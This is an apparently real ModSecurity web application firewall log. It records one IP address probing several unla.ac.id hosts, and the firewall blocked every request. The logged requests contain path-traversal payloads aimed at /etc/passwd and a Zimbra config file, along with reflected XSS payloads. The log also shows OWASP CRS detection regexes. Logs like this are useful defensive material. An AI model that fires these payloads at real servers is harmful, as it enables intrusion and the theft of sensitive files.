[Tue Aug 29 11:52:25.559305 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../opt/zimbra/conf/localconfig.xml\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15icCo-f0AAAoEZOUAAAAB"]
[Tue Aug 29 11:52:25.567684 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../opt/zimbra/conf/localconfig.xml\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15icCo-f0AAAfWONYAAAAL"]
[Tue Aug 29 11:52:25.579149 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../opt/zimbra/conf/localconfig.xml\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15icCo-f0AAAnTlPAAAAAA"]
[Tue Aug 29 11:52:25.591603 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15icCo-f0AAAoQ3H0AAAAN"]
[Tue Aug 29 11:52:25.596014 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [84] [MOBILE_HOME] Love Card"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15icCo-f0AAAnHQjoAAAAT"]
[Tue Aug 29 11:52:25.596795 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15icCo-f0AAAlIBmIAAAAn"]
[Tue Aug 29 11:52:25.771649 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15icCo-f0AAAn96BAAAAAD"]
[Tue Aug 29 11:52:26.548136 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/public/login.jsp"] [unique_id "ZO15isCo-f0AAAoPuTcAAAAM"]
[Tue Aug 29 11:52:26.549439 2023] [:error] [pid 2536] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/public/login.jsp"] [unique_id "ZO15isCo-f0AAAnoOrEAAAAf"]
[Tue Aug 29 11:52:26.552005 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/public/login.jsp"] [unique_id "ZO15isCo-f0AAAoEZOcAAAAB"]
[Tue Aug 29 11:52:26.556064 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/public/login.jsp"] [unique_id "ZO15isCo-f0AAAnn2C8AAAAe"]
[Tue Aug 29 11:52:26.567945 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/public/login.jsp"] [unique_id "ZO15isCo-f0AAAoQ3H8AAAAN"]
[Tue Aug 29 11:52:26.594750 2023] [:error] [pid 2573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15isCo-f0AAAoN9cQAAAAJ"]
[Tue Aug 29 11:52:26.601551 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15isCo-f0AAAnTlPQAAAAA"]
[Tue Aug 29 11:52:26.605065 2023] [:error] [pid 2572] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HK1NKDlhXaLCZfBctpGOJrj')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO15isCo-f0AAAoMLasAAAAH"]
[Tue Aug 29 11:52:26.609246 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:author: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO15isCo-f0AAAfWONoAAAAL"]
[Tue Aug 29 11:52:26.619749 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [691] [NEW_INDEX_BANNERS] Trade-in football"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15isCo-f0AAAlIBmYAAAAn"]
[Tue Aug 29 11:52:26.620906 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:page: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php"] [unique_id "ZO15isCo-f0AAAn4008AAAAW"]
[Tue Aug 29 11:52:26.627149 2023] [:error] [pid 2536] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HK1NKDlhXaLCZfBctpGOJrj')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO15isCo-f0AAAnoOrMAAAAf"]
[Tue Aug 29 11:52:26.648894 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:page: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php"] [unique_id "ZO15isCo-f0AAAoO5y8AAAAK"]
[Tue Aug 29 11:52:26.648913 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:page: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php"] [unique_id "ZO15isCo-f0AAAoEZOoAAAAB"]
[Tue Aug 29 11:52:26.659329 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:page: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php"] [unique_id "ZO15isCo-f0AAAoLfFYAAAAG"]
[Tue Aug 29 11:52:26.660751 2023] [:error] [pid 2573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:page: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php"] [unique_id "ZO15isCo-f0AAAoN9cYAAAAJ"]
[Tue Aug 29 11:52:26.660947 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HK1NKDlhXaLCZfBctpGOJrj')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO15isCo-f0AAAn401EAAAAW"]
[Tue Aug 29 11:52:26.663164 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HK1NKDlhXaLCZfBctpGOJrj')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO15isCo-f0AAAlIBmgAAAAn"]
[Tue Aug 29 11:52:26.675292 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HK1NKDlhXaLCZfBctpGOJrj')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO15isCo-f0AAAnn2DMAAAAe"]
[Tue Aug 29 11:52:26.687297 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../opt/zimbra/conf/localconfig.xml\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15isCo-f0AAAoEZOsAAAAB"]
[Tue Aug 29 11:52:27.560012 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:author: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO15i8Co-f0AAAnjjOkAAAAX"]
[Tue Aug 29 11:52:27.585738 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:author: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO15i8Co-f0AAAfWONwAAAAL"]
[Tue Aug 29 11:52:27.604473 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:author: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO15i8Co-f0AAAoEZOwAAAAB"]
[Tue Aug 29 11:52:27.606244 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HK1NKDlhXaLCZfBctpGOJrj')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO15i8Co-f0AAAoPuTsAAAAM"]
